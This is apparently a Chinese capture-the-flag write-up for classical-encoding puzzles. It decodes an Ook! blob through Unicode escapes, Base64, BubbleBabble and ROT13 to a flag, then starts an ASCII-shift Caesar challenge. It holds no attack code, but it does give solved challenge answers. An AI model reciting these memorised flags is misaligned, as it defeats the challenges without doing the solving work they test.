!.?.. ..... ..... ..... !?!!. ?!!!! !!!!! !!!!! !!?.? !.?!! !!!!! !!!!.
!.... ..... ..!.? ..... ..... ...!? !!.?. ..... ..... .?.?! .?... .....
..... ...!. !!!!! !!!!! !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?!.?.
..... ..... ..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! .!...
..... ...!. ....! .?... ..... ..... !?!!. ?.... ..... ...?. ?!.?. .!.?.
..... ..... !?!!. ?.... ..... .?.?! .?!.? ..... ..... ..... ..!?! !.?!!
!!!!! !!!!! !!!!? .?!.? !!!!! !!!!! !.!.. ..... ..... .!... !.?.. .....
..... .!?!! .?... ..... ....? .?!.? ..!.? ..... ..... .!?!! .?... .....
..?.? !.?!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!!
!!!!! !!.!. ..... ..... ....! .!!!! !!!.? ..... ..... ...!? !!.?. .....
..... .?.?! .?... ..... !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?!.?.
..... ..... ..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! .!...
..... ..... !.!!! !!!!! !!!.? ..... ..... ...!? !!.?. ..... ..... .?.?!
.?... ..... ..... .!.?. ..... ..... !?!!. ?.... ..... .?.?! .?!.? .....
..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!! !.!.. .....
!.!!! .?... ..... ..... !?!!. ?.... ..... ...?. ?!.?. ..... ..... .!.?.
..... ..... !?!!. ?.... ..... .?.?! .?!.? ..... ..... ..... ..!?! !.?!!
!!!!! !!!!! !!!!? .?!.? !!!!! !!!!! !.!.. ..... ....! ...!. ?.... .....
....! ?!!.? ..... ..... ..?.? !.?.. ..!.? ..... ..... .!?!! .?... .....
..?.? !.?!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!!
!!!!! !!.!. ..... ..... ..!.? ..... ..... ...!? !!.?. ..... ..... .?.?!
.?... ..... ..... .!.!! !!!!! !!!!. ?.... ..... ..!?! !.?.. ..... ...?.
?!.?! .?... ..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?! .?!!! !!!!!
!!!.! ..... ..... ...!. !!!!! !!!!. ?.... ..... ....! ?!!.? ..... .....
..?.? !.?.. ..... ..... !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?!.?.
..... ..... ..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! .!...
....! .!!!. ?.... ..... ....! ?!!.? ..... ..... ..?.? !.?.. ..... .....
!.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?!.?. ..... ..... ..... .!?!!
.?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! .!... ..... ..... !.!!! !!!!.
?.... ..... ....! ?!!.? ..... ..... ..?.? !.?.. ..... ...!. ?.... .....
..!?! !.?.. ..... ...?. ?!.?! .?... ..... ..... ....! ?!!.? !!!!! !!!!!
!!!!! !?.?! .?!!! !!!!! !!!.! ..... ..... ..... !.!!! !!!!. ?.... .....
....! ?!!.? ..... ..... ..?.? !.?.. ..... .!.?. ..... ..... !?!!. ?....
..... .?.?! .?!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.?
!!!!! !!!!! !.!.. ..... ..... .!.!! !!!.? ..... ..... ...!? !!.?. .....
..... .?.?! .?... ..... !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?!.?.
..... ..... ..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! .!...
..... ..... !.?.. ..... ..... .!?!! .?... ..... ....? .?!.? ..... .....
..... ..... ..!.! !!!!! !!!!! !!!!! !!!.? ..... ..... .!?!! .?... .....
..?.? !.?!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!!
!!!!! !!.!. ..... ..... ..!.? ..... ..... ...!? !!.?. ..... ..... .?.?!
.?... ..... ..... ..... !.!!! !!!!! !!!!! !!.?. ..... ..... !?!!. ?....
..... .?.?! .?!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.?
!!!!! !!!!! !.!.. ..... !.!!! .?... ..... ..... !?!!. ?.... ..... ...?.
?!.?. ..... ..... .!.?. ..... ..... !?!!. ?.... ..... .?.?! .?!.? .....
..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!! !.!.. .....
....! ..... ....! .?... ..... ...!? !!.?. ..... ....? .?!.? ..... .....
..... ..... !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?!.?. ..... .....
..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! .!... ..... ...!.
....! .?... ..... ..... !?!!. ?.... ..... ...?. ?!.?. .!.?. ..... .....
!?!!. ?.... ..... .?.?! .?!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!!
!!!!? .?!.? !!!!! !!!!! !.!.. ..... ..... ...!. !!!!! !!!!. ?.... .....
....! ?!!.? ..... ..... ..?.? !.?.. ..... ...!. ?.... ..... ..!?! !.?..
..... ...?. ?!.?! .?... ..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?!
.?!!! !!!!! !!!.! ..... ..... ..... !.!!! !!!!. ?.... ..... ....! ?!!.?
..... ..... ..?.? !.?.. ..... .!.?. ..... ..... !?!!. ?.... ..... .?.?!
.?!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!!
!.!.. ..... ..... .!.!! !!!!! !!.?. ..... ..... ..!?! !.?.. ..... .....
?.?!. ?.... ..... ...!. ?.... ..... ..!?! !.?.. ..... ...?. ?!.?! .?...
..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?! .?!!! !!!!! !!!.! .....
..... .!... ..!.? ..... ..... ...!? !!.?. ..... ..... .?.?! .?..! .?...
..... ...!? !!.?. ..... ....? .?!.? !.?.. ..... ..... ..... !?!!. ?!!!!
!!!!! !!!!! !!?.? !.?!! !!!!! !!!!. !.... ..... ....! .?... ..... .....
!?!!. ?.... ..... ...?. ?!.?. ..... ..... ..... ..!.! !!!!! !!!!! !!!!.
?.... ..... ..!?! !.?.. ..... ...?. ?!.?! .?... ..... ..... ....! ?!!.?
!!!!! !!!!! !!!!! !?.?! .?!!! !!!!! !!!.! ..... ..... ..... !.!!! !!!!!
!.?.. ..... ..... .!?!! .?... ..... ....? .?!.? ..... ..... !.?.. .....
....! ?!!.? ..... ..... ?.?!. ?!.?. ..... ..... ..... .!?!! .?!!! !!!!!
!!!!! !!!?. ?!.?! !!!!! !!!!! .!... ..... ..... !.!!! !!!!! !!!.? .....
..... ...!? !!.?. ..... ..... .?.?! .?... ..... ..... .!.?. ..... .....
!?!!. ?.... ..... .?.?! .?!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!!
!!!!? .?!.? !!!!! !!!!! !.!.. ..... ....! ..... !.?.. ..... ..... .!?!!
.?... ..... ....? .?!.? ..!.? ..... ..... .!?!! .?... ..... ..?.? !.?!.
?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.!.
..... ..... ....! .!.?. ..... ..... ..!?! !.?.. ..... ..... ?.?!. ?..!.
?.... ..... ..!?! !.?.. ..... ...?. ?!.?! .?... ..... ..... ....! ?!!.?
!!!!! !!!!! !!!!! !?.?! .?!!! !!!!! !!!.! ..... ..... ..... !.!!! !!!!.
?.... ..... ....! ?!!.? ..... ..... ..?.? !.?.. ..... .!.?. ..... .....
!?!!. ?.... ..... .?.?! .?!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!!
!!!!? .?!.? !!!!! !!!!! !.!.. ..... ..... .!.!! !!!!! !!.?. ..... .....
..!?! !.?.. ..... ..... ?.?!. ?.... ..... ...!. ?.... ..... ..!?! !.?..
..... ...?. ?!.?! .?... ..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?!
.?!!! !!!!! !!!.! ..... ..... .!... ....! .?... ..... ..... !?!!. ?....
..... ...?. ?!.?! .?... ..... ...!? !!.?. ..... ....? .?!.? !.?.. .....
..... ..... !?!!. ?!!!! !!!!! !!!!! !!?.? !.?!! !!!!! !!!!. !.... .....
....! .?... ..... ..... !?!!. ?.... ..... ...?. ?!.?. ..... ..... .....
..!.! !!!!! !!!!! !!!!. ?.... ..... ..!?! !.?.. ..... ...?. ?!.?! .?...
..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?! .?!!! !!!!! !!!.! .....
..... ..... !.!!! !!!!. ?.... ..... ....! ?!!.? ..... ..... ..?.? !.?..
..... .!.?. ..... ..... !?!!. ?.... ..... .?.?! .?!.? ..... ..... .....
..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!! !.!.. ..... ....! .?...
..... ..... !?!!. ?.... ..... ...?. ?!.?. ..... ..... ..... !.!!! !!!!!
!!!.? ..... ..... .!?!! .?... ..... ..?.? !.?!. ?.... ..... ..... ...!?
!!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.!. ..... ..... !.... .!.?.
..... ..... ..!?! !.?.. ..... ..... ?.?!. ?..!. ?.... ..... ..!?! !.?..
..... ...?. ?!.?! .?... ..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?!
.?!!! !!!!! !!!.! ..... ..... .!... ..... .!.?. ..... ..... !?!!. ?....
..... .?.?! .?... ..... ..... ..... ..!.? ..... ..... .!?!! .?... .....
..?.? !.?!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!!
!!!!! !!.!. ..... ..... ....! .!!!! !!!.? ..... ..... ...!? !!.?. .....
..... .?.?! .?... ..... !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?!.?.
..... ..... ..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! .!...
..... ...!. ..... ...!. ?.... ..... ..!?! !.?.. ..... ...?. ?!.?. .....
..... ..... ....! .?... ..... ...!? !!.?. ..... ....? .?!.? !.?.. .....
..... ..... !?!!. ?!!!! !!!!! !!!!! !!?.? !.?!! !!!!! !!!!. !.... .....
....! .?... ..... ..... !?!!. ?.... ..... ...?. ?!.?. ..... ..... .....
..... .!.!! !!!!! !!!!! !!!!! !!.?. ..... ..... !?!!. ?.... ..... .?.?!
.?!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!!
!.!.. ..... ....! ...!. ?.... ..... ....! ?!!.? ..... ..... ..?.? !.?..
..!.? ..... ..... .!?!! .?... ..... ..?.? !.?!. ?.... ..... ..... ...!?
!!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.!. ..... ..... ....! .!.?.
..... ..... ..!?! !.?.. ..... ..... ?.?!. ?..!. ?.... ..... ..!?! !.?..
..... ...?. ?!.?! .?... ..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?!
.?!!! !!!!! !!!.! ..... ..... .!... ..... .!.?. ..... ..... !?!!. ?....
..... .?.?! .?... ..... ..... ..... ..!.? ..... ..... .!?!! .?... .....
..?.? !.?!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!!
!!!!! !!.!. ..... ..... !.... .!.?. ..... ..... ..!?! !.?.. ..... .....
?.?!. ?..!. ?.... ..... ..!?! !.?.. ..... ...?. ?!.?! .?... ..... .....
....! ?!!.? !!!!! !!!!! !!!!! !?.?! .?!!! !!!!! !!!.! ..... ..... ...!.
..!.? ..... ..... ...!? !!.?. ..... ..... .?.?! .?..! .?... ..... ...!?
!!.?. ..... ....? .?!.? !.?.. ..... ..... ..... !?!!. ?!!!! !!!!! !!!!!
!!?.? !.?!! !!!!! !!!!. !.... ..... ..... .!.!! !!!!! .?... ..... .....
!?!!. ?.... ..... ...?. ?!.?. ..... ..!.? ..... ..... .!?!! .?... .....
..?.? !.?!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!!
!!!!! !!.!. ..... ..... ..!.! !!.?. ..... ..... ..!?! !.?.. ..... .....
?.?!. ?.... ..!.? ..... ..... .!?!! .?... ..... ..?.? !.?!. ?.... .....
..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.!. ..... .....
..!.? ..... ..... ...!? !!.?. ..... ..... .?.?! .?... ..... ..... .....
..!.! !!!!! !!!!! !!!!! !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?!.?.
..... ..... ..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! .!...
..... ...!. ..!.? ..... ..... ...!? !!.?. ..... ..... .?.?! .?... .!.?.
..... ..... !?!!. ?.... ..... .?.?! .?!.? ..... ..... ..... ..!?! !.?!!
!!!!! !!!!! !!!!? .?!.? !!!!! !!!!! !.!.. ..... ..... ...!. !.?.. .....
..... .!?!! .?... ..... ....? .?!.? ..!.? ..... ..... .!?!! .?... .....
..?.? !.?!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!!
!!!!! !!.!. ..... ..... ..!.! !!!!! !!!!! .?... ..... ..... !?!!. ?....
..... ...?. ?!.?. ..... ..... ...!. ?.... ..... ..!?! !.?.. ..... ...?.
?!.?! .?... ..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?! .?!!! !!!!!
!!!.! ..... ..... .!... ..!.? ..... ..... ...!? !!.?. ..... ..... .?.?!
.?..! .?... ..... ...!? !!.?. ..... ....? .?!.? !.?.. ..... ..... .....
!?!!. ?!!!! !!!!! !!!!! !!?.? !.?!! !!!!! !!!!. !.... ..... ....! ...!.
?.... ..... ....! ?!!.? ..... ..... ..?.? !.?.. !.?.. ..... ....! ?!!.?
..... ..... ?.?!. ?!.?. ..... ..... ..... .!?!! .?!!! !!!!! !!!!! !!!?.
?!.?! !!!!! !!!!! .!... ..... ..... ..!.! !!!!! !.?.. ..... ..... .!?!!
.?... ..... ....? .?!.? ..... ...!. ?.... ..... ..!?! !.?.. ..... ...?.
?!.?! .?... ..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?! .?!!! !!!!!
!!!.! ..... ..... ...!. !!!!! !!!!! !.?.. ..... ..... .!?!! .?... .....
....? .?!.? ..... ..... ....! .?... ..... ...!? !!.?. ..... ....? .?!.?
!.?.. ..... ..... ..... !?!!. ?!!!! !!!!! !!!!! !!?.? !.?!! !!!!! !!!!.
!.... ..... !.... ...!. ?.... ..... ....! ?!!.? ..... ..... ..?.? !.?..
!.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?!.?. ..... ..... ..... .!?!!
.?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! .!... ..... .!... ..!.? .....
..... ...!? !!.?. ..... ..... .?.?! .?... .!.?. ..... ..... !?!!. ?....
..... .?.?! .?!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.?
!!!!! !!!!! !.!.. ..... ..... .!... ....! .?... ..... ...!? !!.?. .....
....? .?!.? ..... ..... ..... ..... !.?.. ..... ....! ?!!.? ..... .....
?.?!. ?!.?. ..... ..... ..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!!
!!!!! .!... ..... ..... !.!!! .?... ..... ..... !?!!. ?.... ..... ...?.
?!.?. ..... !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?!.?. ..... .....
..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! .!... ..... ...!.
....! .?... ..... ..... !?!!. ?.... ..... ...?. ?!.?. .!.?. ..... .....
!?!!. ?.... ..... .?.?! .?!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!!
!!!!? .?!.? !!!!! !!!!! !.!.. ..... ..... ...!. !!!!! !!!!. ?.... .....
....! ?!!.? ..... ..... ..?.? !.?.. ..... ...!. ?.... ..... ..!?! !.?..
..... ...?. ?!.?! .?... ..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?!
.?!!! !!!!! !!!.! ..... ..... ..... !.!!! !!!!. ?.... ..... ....! ?!!.?
..... ..... ..?.? !.?.. ..... .!.?. ..... ..... !?!!. ?.... ..... .?.?!
.?!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!!
!.!.. ..... ..... .!.!! !!!!! !!.?. ..... ..... ..!?! !.?.. ..... .....
?.?!. ?.... ..... ...!. ?.... ..... ..!?! !.?.. ..... ...?. ?!.?! .?...
..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?! .?!!! !!!!! !!!.! .....
....! ..... ..!.? ..... ..... ...!? !!.?. ..... ..... .?.?! .?..! .?...
..... ...!? !!.?. ..... ....? .?!.? !.?.. ..... ..... ..... !?!!. ?!!!!
!!!!! !!!!! !!?.? !.?!! !!!!! !!!!. !.... ..... ..!.. .!.?. ..... .....
..!?! !.?.. ..... ..... ?.?!. ?.... !.?.. ..... ....! ?!!.? ..... .....
?.?!. ?!.?. ..... ..... ..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!!
!!!!! .!... ..... ..... ..!.! !!!!! !!!.? ..... ..... ...!? !!.?. .....
..... .?.?! .?... ..... ..!.? ..... ..... .!?!! .?... ..... ..?.? !.?!.
?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.!.
..... ..... ..!.! !!!!. ?.... ..... ....! ?!!.? ..... ..... ..?.? !.?..
..... .!.?. ..... ..... !?!!. ?.... ..... .?.?! .?!.? ..... ..... .....
..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!! !.!.. ..... ....! .....
!.?.. ..... ..... .!?!! .?... ..... ....? .?!.? ..!.? ..... ..... .!?!!
.?... ..... ..?.? !.?!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!!
?.?!. ?!!!! !!!!! !!.!. ..... ..... !.!!! !!!!! !.?.. ..... ..... .!?!!
.?... ..... ....? .?!.? ..... ..... ....! .?... ..... ...!? !!.?. .....
....? .?!.? !.?.. ..... ..... ..... !?!!. ?!!!! !!!!! !!!!! !!?.? !.?!!
!!!!! !!!!. !.... ..... ..... .!.!! !!!!! .?... ..... ..... !?!!. ?....
..... ...?. ?!.?. ..... ..!.? ..... ..... .!?!! .?... ..... ..?.? !.?!.
?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.!.
..... ..... !.... ..... !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?....
..... ..... ..... .!.?. ..... ..... !?!!. ?.... ..... .?.?! .?!.? .....
..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!! !.!.. .....
!.!!! .?... ..... ..... !?!!. ?.... ..... ...?. ?!.?. ..... ..... .!.?.
..... ..... !?!!. ?.... ..... .?.?! .?!.? ..... ..... ..... ..!?! !.?!!
!!!!! !!!!! !!!!? .?!.? !!!!! !!!!! !.!.. ..... !.... ..... ....! .?...
..... ...!? !!.?. ..... ....? .?!.? ..... ..... ..... ..... !.?.. .....
....! ?!!.? ..... ..... ?.?!. ?!.?. ..... ..... ..... .!?!! .?!!! !!!!!
!!!!! !!!?. ?!.?! !!!!! !!!!! .!... ..... ..... ..!.! !!!!! !!!.? .....
..... ...!? !!.?. ..... ..... .?.?! .?... ..... ..!.? ..... ..... .!?!!
.?... ..... ..?.? !.?!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!!
?.?!. ?!!!! !!!!! !!.!. ..... ..... ..!.! !!!!. ?.... ..... ....! ?!!.?
..... ..... ..?.? !.?.. ..... .!.?. ..... ..... !?!!. ?.... ..... .?.?!
.?!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!!
!.!.. ..... ....! ..... !.?.. ..... ..... .!?!! .?... ..... ....? .?!.?
..!.? ..... ..... .!?!! .?... ..... ..?.? !.?!. ?.... ..... ..... ...!?
!!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.!. ..... ..... ....! .!!!!
!!!!! .?... ..... ..... !?!!. ?.... ..... ...?. ?!.?. ..... ....! .?...
..... ...!? !!.?. ..... ....? .?!.? !.?.. ..... ..... ..... !?!!. ?!!!!
!!!!! !!!!! !!?.? !.?!! !!!!! !!!!. !.... ..... ..... .!.!! !!!!! .?...
..... ..... !?!!. ?.... ..... ...?. ?!.?. ..... ..!.? ..... ..... .!?!!
.?... ..... ..?.? !.?!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!!
?.?!. ?!!!! !!!!! !!.!. ..... ..... ..!.! !!!!! !!!.? ..... ..... ...!?
!!.?. ..... ..... .?.?! .?... ..... ....! .?... ..... ...!? !!.?. .....
....? .?!.? !.?.. ..... ..... ..... !?!!. ?!!!! !!!!! !!!!! !!?.? !.?!!
!!!!! !!!!. !.... ..... !.... ..... !.?.. ..... ..... .!?!! .?... .....
....? .?!.? !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?!.?. ..... .....
..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! .!... ..... .....
!.?.. ..... ..... .!?!! .?... ..... ....? .?!.? ..... ..... ..... ...!.
!!!!! !!!!! !!!!! .?... ..... ...!? !!.?. ..... ....? .?!.? !.?.. .....
..... ..... !?!!. ?!!!! !!!!! !!!!! !!?.? !.?!! !!!!! !!!!. !.... ...!.
!!!!! !!.?. ..... ..... ..!?! !.?.. ..... ..... ?.?!. ?.... ..... .....
..!.? ..... ..... .!?!! .?... ..... ..?.? !.?!. ?.... ..... ..... ...!?
!!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.!. ..... ..... ..!.! !!!!!
!!!.? ..... ..... ...!? !!.?. ..... ..... .?.?! .?... ..... ....! .?...
..... ...!? !!.?. ..... ....? .?!.? !.?.. ..... ..... ..... !?!!. ?!!!!
!!!!! !!!!! !!?.? !.?!! !!!!! !!!!. !.... ...!. !!!.? ..... ..... ...!?
!!.?. ..... ..... .?.?! .?... ..... ....! .?... ..... ...!? !!.?. .....
....? .?!.? !.?.. ..... ..... ..... !?!!. ?!!!! !!!!! !!!!! !!?.? !.?!!
!!!!! !!!!. !.... ..... ..... .!.!. ?.... ..... ....! ?!!.? ..... .....
..?.? !.?.. !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?!.?. ..... .....
..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! .!... ..... .....
..!.! !!!!! !.?.. ..... ..... .!?!! .?... ..... ....? .?!.? ..... ...!.
?.... ..... ..!?! !.?.. ..... ...?. ?!.?! .?... ..... ..... ....! ?!!.?
!!!!! !!!!! !!!!! !?.?! .?!!! !!!!! !!!.! ..... ..... ...!. !!!!! !!!!!
!.?.. ..... ..... .!?!! .?... ..... ....? .?!.? ..... ..... ....! .?...
..... ...!? !!.?. ..... ....? .?!.? !.?.. ..... ..... ..... !?!!. ?!!!!
!!!!! !!!!! !!?.? !.?!! !!!!! !!!!. !.... ...!. !.?.. ..... ..... .!?!!
.?... ..... ....? .?!.? ..... ..... !.?.. ..... ....! ?!!.? ..... .....
?.?!. ?!.?. ..... ..... ..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!!
!!!!! .!... ..... ...!. ..!.? ..... ..... ...!? !!.?. ..... ..... .?.?!
.?... .!.?. ..... ..... !?!!. ?.... ..... .?.?! .?!.? ..... ..... .....
..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!! !.!.. ..... ..... ...!.
!!!!! !!.?. ..... ..... ..!?! !.?.. ..... ..... ?.?!. ?.... ....! .?...
..... ...!? !!.?. ..... ....? .?!.? !.?.. ..... ..... ..... !?!!. ?!!!!
!!!!! !!!!! !!?.? !.?!! !!!!! !!!!. !.... ..... ....! .!!!! !!!!! !!.?.
..... ..... ..!?! !.?.. ..... ..... ?.?!. ?.... ..... ..... !.?.. .....
....! ?!!.? ..... ..... ?.?!. ?!.?. ..... ..... ..... .!?!! .?!!! !!!!!
!!!!! !!!?. ?!.?! !!!!! !!!!! .!... ..... ...!. ....! .?... ..... .....
!?!!. ?.... ..... ...?. ?!.?. .!.?. ..... ..... !?!!. ?.... ..... .?.?!
.?!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!!
!.!.. ..... ..... .!... !.?.. ..... ..... .!?!! .?... ..... ....? .?!.?
..!.? ..... ..... .!?!! .?... ..... ..?.? !.?!. ?.... ..... ..... ...!?
!!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.!. ..... ..... ....! .!!!!
!!!.? ..... ..... ...!? !!.?. ..... ..... .?.?! .?... ..... !.?.. .....
....! ?!!.? ..... ..... ?.?!. ?!.?. ..... ..... ..... .!?!! .?!!! !!!!!
!!!!! !!!?. ?!.?! !!!!! !!!!! .!... ..... ..... !.!!! !!!!! !.?.. .....
..... .!?!! .?... ..... ....? .?!.? ..... ..... ..!.? ..... ..... .!?!!
.?... ..... ..?.? !.?!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!!
?.?!. ?!!!! !!!!! !!.!. ..... ..... !.... .!.?. ..... ..... ..!?! !.?..
..... ..... ?.?!. ?..!. ?.... ..... ..!?! !.?.. ..... ...?. ?!.?! .?...
..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?! .?!!! !!!!! !!!.! .....
..!.. ..... ..... .!.?. ..... ..... !?!!. ?.... ..... .?.?! .?... .....
..... ..... ..!.? ..... ..... .!?!! .?... ..... ..?.? !.?!. ?.... .....
..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.!. ..... .!...
....! .?... ..... ..... !?!!. ?.... ..... ...?. ?!.?. ...!. ?.... .....
..!?! !.?.. ..... ...?. ?!.?! .?... ..... ..... ....! ?!!.? !!!!! !!!!!
!!!!! !?.?! .?!!! !!!!! !!!.! ..... ..... ...!. !!!!! .?... ..... .....
!?!!. ?.... ..... ...?. ?!.?. ..... ..!.? ..... ..... .!?!! .?... .....
..?.? !.?!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!!
!!!!! !!.!. ..... ..... !.... ...!. ?.... ..... ....! ?!!.? ..... .....
..?.? !.?!. ?.... ..... ..!?! !.?.. ..... ...?. ?!.?! .?... ..... .....
....! ?!!.? !!!!! !!!!! !!!!! !?.?! .?!!! !!!!! !!!.! ..... ..... ...!.
..!.? ..... ..... ...!? !!.?. ..... ..... .?.?! .?..! .?... ..... ...!?
!!.?. ..... ....? .?!.? !.?.. ..... ..... ..... !?!!. ?!!!! !!!!! !!!!!
!!?.? !.?!! !!!!! !!!!. !.... ...!. ?.... ..... ..... .!?!! .?... .....
..... .?.?! .?!.? .

直接用网站解码ook

image-20220403172708408

然后得到了一串unicode编码

\u0065\u0047\u006c\u0069\u005a\u0057\u0067\u0074\u0061\u0032\u0056\u006a\u0062\u0032\u0063\u0074\u0064\u006e\u006c\u0032\u0059\u0057\u0073\u0074\u0062\u0057\u006c\u0073\u0061\u0057\u0077\u0074\u0062\u0058\u006c\u0074\u005a\u0057\u0059\u0074\u0059\u006e\u0056\u0077\u0059\u0057\u0067\u0074\u0065\u006d\u0056\u0077\u0061\u0057\u0067\u0074\u0061\u0047\u0046\u0069\u0065\u0057\u0073\u0074\u0062\u0047\u0056\u0073\u0064\u0057\u0051\u0074\u0059\u0032\u0039\u0073\u0064\u0057\u0073\u0074\u0062\u0048\u006c\u0030\u0062\u0032\u0077\u0074\u0061\u0033\u0056\u0074\u0061\u0057\u0067\u0074\u0062\u0057\u0039\u0036\u0064\u0058\u0067\u003d

image-20220403172756409

eGliZWgta2Vjb2ctdnl2YWstbWlsaWwtbXltZWYtYnVwYWgtemVwaWgtaGFieWstbGVsdWQtY29sdWstbHl0b2wta3VtaWgtbW96dXg=

盲猜base64

image-20220403172836633

xibeh-kecog-vyvak-milil-mymef-bupah-zepih-habyk-lelud-coluk-lytol-kumih-mozux

查看wp发现这是BubbleBabble,简单得去了解一下,记一下特征,然后用工具一把梭

image-20220403173259071

得到AVFN{h_xa0j_jU@g_!_guvaX}

发现提交不正确,再看一下这个flag也没有意义,比如说前不应该是ACFN,所以考虑是不是替换密码,所以就去试了一下凯撒

image-20220403173607597

发现是ROT13

flag为NISA{u_kn0w_wH@t_!_thinK}

funnycaeser

题目:NRQ;P<uLliW^(XQ/QT\NDh
提示:凯撒5号说:大家为什么都说我很奇怪?

尝试一下凯撒偏移5

image-20220403173838296

很显然不是,而且反向偏移5也明显不是,所以考虑他应该是偏移密码的变种,首先想到偏移ascii码,写个python脚本看看

image-20220403174648737

在找个ascii字母表对照看一下

二进制十进制十六进制字符/缩写解释
00000000000NUL (NULL)空字符
00000001101SOH (Start Of Headling)标题开始
00000010202STX (Start Of Text)正文开始
00000011303ETX (End Of Text)正文结束
00000100404EOT (End Of Transmission)传输结束
00000101505ENQ (Enquiry)请求
00000110606ACK (Acknowledge)回应/响应/收到通知
00000111707BEL (Bell)响铃
00001000808BS (Backspace)退格
00001001909HT (Horizontal Tab)水平制表符
00001010100ALF/NL(Line Feed/New Line)换行键
00001011110BVT (Vertical Tab)垂直制表符
00001100120CFF/NP (Form Feed/New Page)换页键
00001101130DCR (Carriage Return)回车键
00001110140ESO (Shift Out)不用切换
00001111150FSI (Shift In)启用切换
000100001610DLE (Data Link Escape)数据链路转义
000100011711DC1/XON (Device Control 1/Transmission On)设备控制1/传输开始
